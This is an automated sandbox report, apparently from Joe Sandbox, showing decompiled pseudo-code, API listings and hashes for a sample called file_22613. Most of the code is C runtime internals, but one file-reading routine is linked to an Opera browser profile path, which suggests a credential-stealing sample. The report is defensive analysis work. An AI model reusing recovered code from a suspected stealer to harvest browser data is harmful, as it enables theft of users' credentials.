                                                                                						_t237 =  *(_t370 - 0x58) +  *((intOrPtr*)(_t370 - 0x4c)) +  *(_t370 - 0x64) +  *(_t370 - 0x5c);
                                                                                						_t397 =  *((intOrPtr*)(_t301 + 0x24));
                                                                                						if(_t397 < 0 || _t397 <= 0 && _t314 <= 0 || _t314 <= _t237) {
                                                                                							 *(_t370 - 0x54) = 0;
                                                                                						} else {
                                                                                							 *(_t370 - 0x54) = _t314 - _t237;
                                                                                						}
                                                                                						_t239 =  *(_t301 + 0x14) & 0x000001c0;
                                                                                						if(_t239 != 0x40) {
                                                                                							if(_t239 == 0x100 &&  *(_t370 - 0x84) > 0) {
                                                                                								_t281 = E00419074(_t344, _t370 - 0x6c,  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)), 1);
                                                                                								_t301 =  *((intOrPtr*)(_t370 - 0x80));
                                                                                								_t373 = _t373 + 0xc;
                                                                                								 *((intOrPtr*)(_t370 - 0x50)) =  *((intOrPtr*)(_t370 - 0x50)) + 1;
                                                                                								 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 - 0x4c)) - 1;
                                                                                								_t344 =  *((intOrPtr*)(_t370 - 0x50));
                                                                                								 *((intOrPtr*)(_t370 + 0x20)) =  *_t281;
                                                                                								 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t281 + 4));
                                                                                							}
                                                                                							_t278 = E00418F73(_t370 - 0x6c,  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)),  *((intOrPtr*)(_t370 - 0x7c)),  *(_t370 - 0x54));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t278;
                                                                                							_t373 = _t373 + 0x10;
                                                                                							 *(_t370 - 0x54) =  *(_t370 - 0x54) & 0x00000000;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t278 + 4));
                                                                                						}
                                                                                						_t241 = E0041F230(_t344,  *((char*)(_t370 - 0x60)),  *((intOrPtr*)(_t370 - 0x4c)));
                                                                                						_t374 = _t373 + 0xc;
                                                                                						if(_t241 != 0) {
                                                                                							 *(_t370 - 0x68) = _t241 - _t344 + 1;
                                                                                							_t269 = E004190AD(_t344, 0, _t370 - 0x88, _t241 - _t344 + 1 - 1,  *((intOrPtr*)(_t370 - 0x70)),  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t269;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t269 + 4));
                                                                                							_t270 = E00418F73(_t370 - 0x88,  *_t269,  *((intOrPtr*)(_t269 + 4)), 0x30,  *(_t370 - 0x5c));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t270;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t270 + 4));
                                                                                							 *((char*)(_t370 - 0x74)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 - 0x74)))) + 4))();
                                                                                							_t274 = E00418F73(_t370 - 0x88,  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)),  *((intOrPtr*)(_t370 - 0x74)), 1);
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t274;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t274 + 4));
                                                                                							_t275 = E00418F73(_t370 - 0x78,  *_t274,  *((intOrPtr*)(_t274 + 4)), 0x30,  *(_t370 - 0x64));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t275;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t275 + 4));
                                                                                							_t277 =  *(_t370 - 0x68);
                                                                                							_t344 = _t344 + _t277;
                                                                                							_t374 = _t374 + 0x44;
                                                                                							 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 - 0x4c)) - _t277;
                                                                                							 *((intOrPtr*)(_t370 - 0x50)) = _t344;
                                                                                						}
                                                                                						_t242 = E0041F230(_t344, 0x65,  *((intOrPtr*)(_t370 - 0x4c)));
                                                                                						_t375 = _t374 + 0xc;
                                                                                						if(_t242 != 0) {
                                                                                							 *((intOrPtr*)(_t370 - 0x74)) = _t242 - _t344 + 1;
                                                                                							_t258 = E004190AD(_t344, 0, _t370 - 0x90, _t242 - _t344 + 1 - 1,  *((intOrPtr*)(_t370 - 0x70)),  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t258;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t258 + 4));
                                                                                							_t259 = E00418F73(_t370 - 0x90,  *_t258,  *((intOrPtr*)(_t258 + 4)), 0x30,  *(_t370 - 0x58));
                                                                                							 *(_t370 - 0x58) =  *(_t370 - 0x58) & 0x00000000;
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t259;
                                                                                							_t379 = _t375 + 0x24;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t259 + 4));
                                                                                							_t324 = "E";
                                                                                							if(( *(_t301 + 0x14) & 0x00000004) == 0) {
                                                                                								_t324 = "e";
                                                                                							}
                                                                                							_t261 = E00419074(_t324, _t370 - 0x90,  *_t259,  *((intOrPtr*)(_t259 + 4)), 1);
                                                                                							_t301 =  *((intOrPtr*)(_t370 - 0x80));
                                                                                							 *((intOrPtr*)(_t370 + 0x20)) =  *_t261;
                                                                                							 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t261 + 4));
                                                                                							_t263 =  *((intOrPtr*)(_t370 - 0x74));
                                                                                							 *((intOrPtr*)(_t370 - 0x50)) =  *((intOrPtr*)(_t370 - 0x50)) + _t263;
                                                                                							_t344 =  *((intOrPtr*)(_t370 - 0x50));
                                                                                							_t375 = _t379 + 0xc;
                                                                                							 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 - 0x4c)) - _t263;
                                                                                						}
                                                                                						_t245 = E004190AD(_t344, 0, _t370 - 0x78,  *((intOrPtr*)(_t370 - 0x4c)),  *((intOrPtr*)(_t370 - 0x70)),  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)));
                                                                                						 *((intOrPtr*)(_t370 + 0x20)) =  *_t245;
                                                                                						 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t245 + 4));
                                                                                						_t246 = E00418F73(_t370 - 0x6c,  *_t245,  *((intOrPtr*)(_t245 + 4)), 0x30,  *(_t370 - 0x58));
                                                                                						 *((intOrPtr*)(_t370 + 0x20)) =  *_t246;
                                                                                						 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t246 + 4));
                                                                                						 *((intOrPtr*)(_t301 + 0x20)) = 0;
                                                                                						 *((intOrPtr*)(_t301 + 0x24)) = 0;
                                                                                						E00418F73( *((intOrPtr*)(_t370 + 8)),  *_t246,  *((intOrPtr*)(_t246 + 4)),  *((intOrPtr*)(_t370 - 0x7c)),  *(_t370 - 0x54));
                                                                                						E00402C34(_t370 - 0x2c, 1, 0);
                                                                                						E00402C34(_t370 - 0x48, 1, 0);
                                                                                						return E00421A61(_t301, 0,  *((intOrPtr*)(_t370 + 8)));
                                                                                					} else {
                                                                                						_t283 =  *((intOrPtr*)(_t370 - 0x48));
                                                                                						if( *((intOrPtr*)(_t370 - 0x34)) < 0x10) {
                                                                                							_t283 = _t370 - 0x48;
                                                                                						}
                                                                                						_t389 =  *_t283;
                                                                                						if( *_t283 > 0) {
                                                                                							E0040D1DF(_t370 - 0x2c,  *((intOrPtr*)(_t370 - 0x4c)), _t370, _t389, _t344);
                                                                                							if( *(_t370 - 0x54) != 0) {
                                                                                								__eflags =  *(_t370 - 0x68);
                                                                                								if( *(_t370 - 0x68) == 0) {
                                                                                									E0040D70E( *(_t370 - 0x5c), _t313, _t370 - 0x2c, _t370, 0x30);
                                                                                									_t52 = _t370 - 0x5c;
                                                                                									 *_t52 =  *(_t370 - 0x5c) & 0x00000000;
                                                                                									__eflags =  *_t52;
                                                                                								}
                                                                                								__eflags =  *(_t370 - 0x54) -  *((intOrPtr*)(_t370 - 0x50));
                                                                                								E00418795(_t313,  *(_t370 - 0x54) -  *((intOrPtr*)(_t370 - 0x50)), _t370 - 0x2c, _t370,  *(_t370 - 0x58), 0x30);
                                                                                								_t344 =  *((intOrPtr*)(_t370 - 0x50));
                                                                                							} else {
                                                                                								E0040D70E( *(_t370 - 0x58), _t313, _t370 - 0x2c, _t370, 0x30);
                                                                                							}
                                                                                							_t303 =  *(_t370 - 0x68);
                                                                                							_push(0x30);
                                                                                							_t365 = _t370 - 0x2c;
                                                                                							if(_t303 != 0) {
                                                                                								_push( *(_t370 - 0x64));
                                                                                								_t63 = _t303 - _t344 + 1; // 0x1
                                                                                								E00418795(_t313, _t63, _t365, _t370);
                                                                                								E00418795(_t313, _t303 - _t344, _t370 - 0x2c, _t370,  *(_t370 - 0x5c), 0x30);
                                                                                								_t66 = _t370 - 0x64;
                                                                                								 *_t66 =  *(_t370 - 0x64) & 0x00000000;
                                                                                								__eflags =  *_t66;
                                                                                							} else {
                                                                                								E0040D70E( *(_t370 - 0x5c), _t313, _t365, _t370);
                                                                                							}
                                                                                							 *(_t370 - 0x5c) =  *(_t370 - 0x5c) & 0x00000000;
                                                                                							_t305 =  *((intOrPtr*)(_t370 - 0x48));
                                                                                							if( *((intOrPtr*)(_t370 - 0x34)) < 0x10) {
                                                                                								_t305 = _t370 - 0x48;
                                                                                							}
                                                                                							_t289 =  *((intOrPtr*)(_t370 - 0x2c));
                                                                                							if( *((intOrPtr*)(_t370 - 0x18)) < 0x10) {
                                                                                								_t289 = _t370 - 0x2c;
                                                                                							}
                                                                                							_t352 = E00420F40(_t370 - 0x60, _t289, _t370 - 0x60);
                                                                                							while(1) {
                                                                                								_t291 =  *_t305;
                                                                                								if(_t291 == 0x7f) {
                                                                                									break;
                                                                                								}
                                                                                								__eflags = _t291;
                                                                                								if(_t291 <= 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t340 = _t352 -  *(_t370 - 0x84);
                                                                                								_t294 = _t291;
                                                                                								__eflags = _t294 - _t352 -  *(_t370 - 0x84);
                                                                                								if(_t294 >= _t352 -  *(_t370 - 0x84)) {
                                                                                									break;
                                                                                								}
                                                                                								_t352 = _t352 - _t294;
                                                                                								E00418795(_t340, _t352, _t370 - 0x2c, _t370, 1, 0);
                                                                                								_t296 = _t305 + 1;
                                                                                								__eflags =  *_t296;
                                                                                								if( *_t296 > 0) {
                                                                                									_t305 = _t296;
                                                                                								}
                                                                                							}
                                                                                							_t292 =  *((intOrPtr*)(_t370 - 0x2c));
                                                                                							if( *((intOrPtr*)(_t370 - 0x18)) < 0x10) {
                                                                                								_t292 = _t370 - 0x2c;
                                                                                							}
                                                                                							 *(_t370 - 0x58) =  *(_t370 - 0x58) & 0x00000000;
                                                                                							_t301 =  *((intOrPtr*)(_t370 - 0x80));
                                                                                							 *((intOrPtr*)(_t370 - 0x50)) = _t292;
                                                                                							_t344 =  *((intOrPtr*)(_t370 - 0x50));
                                                                                							 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 - 0x1c));
                                                                                						}
                                                                                						goto L32;
                                                                                					}
                                                                                				}
                                                                                				 *(_t370 - 0x84) = 0;
                                                                                				_t384 = _t226 - 0x2d;
                                                                                				if(_t226 != 0x2d) {
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

















































                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00418a4e
                                                                                0x00418a50
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00418a54
                                                                                0x00418a5a
                                                                                0x00418a5d
                                                                                0x00418a5f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00418a63
                                                                                0x00418a6a
                                                                                0x00418a6f
                                                                                0x00418a72
                                                                                0x00418a75
                                                                                0x00418a77
                                                                                0x00418a77
                                                                                0x00418a75
                                                                                0x00418a83
                                                                                0x00418a86
                                                                                0x00418a88
                                                                                0x00418a88
                                                                                0x00418a8b
                                                                                0x00418a8f
                                                                                0x00418a92
                                                                                0x00418a98
                                                                                0x00418a9b
                                                                                0x00418a9b
                                                                                0x00000000
                                                                                0x00418998
                                                                                0x00418983
                                                                                0x00418922
                                                                                0x00418928
                                                                                0x0041892a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00418893
                                                                                  • Part of subcall function 0040F3F7: std::locale::facet::_Incref.LIBCPMT ref: 0040F3FE
                                                                                  • Part of subcall function 004191E8: __EH_prolog3.LIBCMT ref: 004191EF
                                                                                  • Part of subcall function 004191E8: std::_Lockit::_Lockit.LIBCPMT ref: 004191F9
                                                                                • _localeconv.LIBCMT ref: 00418936
                                                                                • _strcspn.LIBCMT ref: 00418A43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3H_prolog3_IncrefLockitLockit::__localeconv_strcspnstd::_std::locale::facet::_
                                                                                • String ID: e$&D
                                                                                • API String ID: 441263477-1218682416
                                                                                • Opcode ID: f29fdf9584b165c6e0e3167bc408f6b2a189221dbc0f29b719ae5c70147c825b
                                                                                • Instruction ID: 2391ae905ea939ae0dbe5c03a397dfc4a9e7d2f80fd704a93d4ba928ffdd51b6
                                                                                • Opcode Fuzzy Hash: f29fdf9584b165c6e0e3167bc408f6b2a189221dbc0f29b719ae5c70147c825b
                                                                                • Instruction Fuzzy Hash: B9F14671D002489FDF15DFA8C941AEDBBB1FF08308F15416AE908BB252DB79A985CF48
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0040F5B8(void** __ebx, long* __esi, CHAR* _a4) {
                                                                                				struct _OVERLAPPED* _v8;
                                                                                				void* _v12;
                                                                                				long _v16;
                                                                                				intOrPtr _v20;
                                                                                				long _v24;
                                                                                				void* _t14;
                                                                                				long _t17;
                                                                                				void* _t18;
                                                                                				void** _t22;
                                                                                
                                                                                				_t22 = __ebx;
                                                                                				_v8 = 0;
                                                                                				_t14 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                                                                				_v12 = _t14;
                                                                                				if(_t14 == 0 || _t14 == 0xffffffff) {
                                                                                					L10:
                                                                                					return _v8;
                                                                                				} else {
                                                                                					__imp__GetFileSizeEx(_t14,  &_v24);
                                                                                					if(_t14 != 0 && _v20 == 0) {
                                                                                						_t17 = _v24;
                                                                                						 *__esi = _t17;
                                                                                						_t18 = LocalAlloc(0x40, _t17);
                                                                                						 *__ebx = _t18;
                                                                                						if(_t18 != 0) {
                                                                                							if(ReadFile(_v12, _t18,  *__esi,  &_v16, 0) == 0 ||  *__esi != _v16) {
                                                                                								_v8 = 0;
                                                                                								LocalFree( *_t22);
                                                                                							} else {
                                                                                								_v8 = 1;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					CloseHandle(_v12);
                                                                                					goto L10;
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040F5D3
                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F5EA
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F601
                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040F618
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F637
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F640
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 2311089104-0
                                                                                • Opcode ID: 3b4c9ab9f4287105c219cc39ab907cd3b0e579fd6292bf237c5ac1d7732f0d53
                                                                                • Instruction ID: 6476f34f5b3a8103b5671e5f2ea3a48eb7ee99b47669c84d37c6fd9ec7a577ba
                                                                                • Opcode Fuzzy Hash: 3b4c9ab9f4287105c219cc39ab907cd3b0e579fd6292bf237c5ac1d7732f0d53
                                                                                • Instruction Fuzzy Hash: A1113D74900208EFDB219FA4CC48EAEBBB9EB45700F200979F541B22A4D7769A57DB15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E0042347F(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr _t57;
                                                                                				void* _t58;
                                                                                				void* _t61;
                                                                                
                                                                                				_t61 = __eflags;
                                                                                				_t53 = __edx;
                                                                                				_push(0x2c);
                                                                                				_push(0x443d68);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				_t48 = __ecx;
                                                                                				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                				 *((intOrPtr*)(_t58 - 0x28)) = E00421870(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00427B66(__edx, _t55, _t61) + 0x88));
                                                                                				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00427B66(__edx, _t55, _t61) + 0x8c));
                                                                                				 *((intOrPtr*)(E00427B66(_t53, _t55, _t61) + 0x88)) = _t57;
                                                                                				 *((intOrPtr*)(E00427B66(_t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                				 *(_t58 - 4) = 1;
                                                                                				 *((intOrPtr*)(_t58 - 0x1c)) = E00421915(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                				 *(_t58 - 4) = 0xfffffffe;
                                                                                				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                				E004235A5(_t48, _t53, _t55, _t57, _t61);
                                                                                				return E00424445( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                			}








                                                                                APIs
                                                                                • __CreateFrameInfo.LIBCMT ref: 004234A7
                                                                                  • Part of subcall function 00421870: __getptd.LIBCMT ref: 0042187E
                                                                                  • Part of subcall function 00421870: __getptd.LIBCMT ref: 0042188C
                                                                                • __getptd.LIBCMT ref: 004234B1
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __getptd.LIBCMT ref: 004234BF
                                                                                • __getptd.LIBCMT ref: 004234CD
                                                                                • __getptd.LIBCMT ref: 004234D8
                                                                                • _CallCatchBlock2.LIBCMT ref: 004234FE
                                                                                  • Part of subcall function 00421915: __CallSettingFrame@12.LIBCMT ref: 00421961
                                                                                  • Part of subcall function 004235A5: __getptd.LIBCMT ref: 004235B4
                                                                                  • Part of subcall function 004235A5: __getptd.LIBCMT ref: 004235C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1602911419-0
                                                                                • Opcode ID: 0169f375b130e5cabf392b8f6fbbf7cdaa7c665f2f4d705376cb3fcd97fe719f
                                                                                • Instruction ID: 970687e236d75bba022f323ded1f8f8acb793f367a031bbe68b9fa7438ec3659
                                                                                • Opcode Fuzzy Hash: 0169f375b130e5cabf392b8f6fbbf7cdaa7c665f2f4d705376cb3fcd97fe719f
                                                                                • Instruction Fuzzy Hash: 1B11D7B1E00219EFDB00EFA5E585BAD7BB0FF04319F50806AF914A7291DB389A519F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __CreateFrameInfo.LIBCMT ref: 00C7BFEC
                                                                                  • Part of subcall function 00C736D8: __getptd.LIBCMT ref: 00C736E6
                                                                                  • Part of subcall function 00C736D8: __getptd.LIBCMT ref: 00C736F4
                                                                                • __getptd.LIBCMT ref: 00C7BFF6
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __getptd.LIBCMT ref: 00C7C004
                                                                                • __getptd.LIBCMT ref: 00C7C012
                                                                                • __getptd.LIBCMT ref: 00C7C01D
                                                                                • _CallCatchBlock2.LIBCMT ref: 00C7C043
                                                                                  • Part of subcall function 00C7377D: __CallSettingFrame@12.LIBCMT ref: 00C737C9
                                                                                  • Part of subcall function 00C7C0EA: __getptd.LIBCMT ref: 00C7C0F9
                                                                                  • Part of subcall function 00C7C0EA: __getptd.LIBCMT ref: 00C7C107
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1602911419-0
                                                                                • Opcode ID: 9240d06fd83b67cfc6d4b07f2531fc850144dc0ecd625aaf3ede75107e353827
                                                                                • Instruction ID: 9a95da0eef0f0352db2f0772596471f618c510e16aa5fb158fd253b7914a0322
                                                                                • Opcode Fuzzy Hash: 9240d06fd83b67cfc6d4b07f2531fc850144dc0ecd625aaf3ede75107e353827
                                                                                • Instruction Fuzzy Hash: A011C3B1D04209EFDF04EFA4C946AADBBB0FF08315F50C569F818A7251EB389A15AF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 00C73123
                                                                                  • Part of subcall function 00C71D0A: __FF_MSGBANNER.LIBCMT ref: 00C71D2D
                                                                                  • Part of subcall function 00C71D0A: __NMSG_WRITE.LIBCMT ref: 00C71D34
                                                                                  • Part of subcall function 00C71D0A: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00C78E57,00000000,00000001,00000000,?,00C73F46,00000018,00DAABD0,0000000C,00C73FD7), ref: 00C71D81
                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 00C73146
                                                                                  • Part of subcall function 00C730EE: std::exception::exception.LIBCMT ref: 00C730FA
                                                                                • std::bad_exception::bad_exception.LIBCMTD ref: 00C7315A
                                                                                • __CxxThrowException@8.LIBCMT ref: 00C73168
                                                                                • __FF_MSGBANNER.LIBCMT ref: 00C7317C
                                                                                • __NMSG_WRITE.LIBCMT ref: 00C73184
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 1411284514-0
                                                                                • Opcode ID: ec567da4e810e02f8b054dcb23bd1c4bd5cee814862f3e72b8e76528a9f37eb1
                                                                                • Instruction ID: e2d5c2f43fc93cbd2768e1498baf2834f26788bf0bbe16e9272726c5521cacef
                                                                                • Opcode Fuzzy Hash: ec567da4e810e02f8b054dcb23bd1c4bd5cee814862f3e72b8e76528a9f37eb1
                                                                                • Instruction Fuzzy Hash: BD01F43150474C6BCB247764EC07AAC3BAD9F41324B90C025FC1D955A2DFB5EB85B1BA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E004271BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t15;
                                                                                				LONG* _t21;
                                                                                				void* _t31;
                                                                                				LONG* _t33;
                                                                                				void* _t34;
                                                                                				void* _t35;
                                                                                
                                                                                				_t35 = __eflags;
                                                                                				_t29 = __edx;
                                                                                				_t25 = __ebx;
                                                                                				_push(0xc);
                                                                                				_push(0x443e88);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				_t31 = E00427B66(__edx, __edi, _t35);
                                                                                				_t15 =  *0x447bf0; // 0xfffffffe
                                                                                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                					E00429078(0xd);
                                                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                					 *(_t34 - 0x1c) = _t33;
                                                                                					__eflags = _t33 -  *0x447af8; // 0x37b1658
                                                                                					if(__eflags != 0) {
                                                                                						__eflags = _t33;
                                                                                						if(__eflags != 0) {
                                                                                							__eflags = InterlockedDecrement(_t33);
                                                                                							if(__eflags == 0) {
                                                                                								__eflags = _t33 - 0x4476d0;
                                                                                								if(__eflags != 0) {
                                                                                									E0041E008(_t33);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t21 =  *0x447af8; // 0x37b1658
                                                                                						 *(_t31 + 0x68) = _t21;
                                                                                						_t33 =  *0x447af8; // 0x37b1658
                                                                                						 *(_t34 - 0x1c) = _t33;
                                                                                						InterlockedIncrement(_t33);
                                                                                					}
                                                                                					 *(_t34 - 4) = 0xfffffffe;
                                                                                					E00427257();
                                                                                				} else {
                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                				}
                                                                                				_t38 = _t33;
                                                                                				if(_t33 == 0) {
                                                                                					E004243E2(_t25, _t29, _t31, _t33, _t38, 0x20);
                                                                                				}
                                                                                				return E00424445(_t33);
                                                                                			}










                                                                                APIs
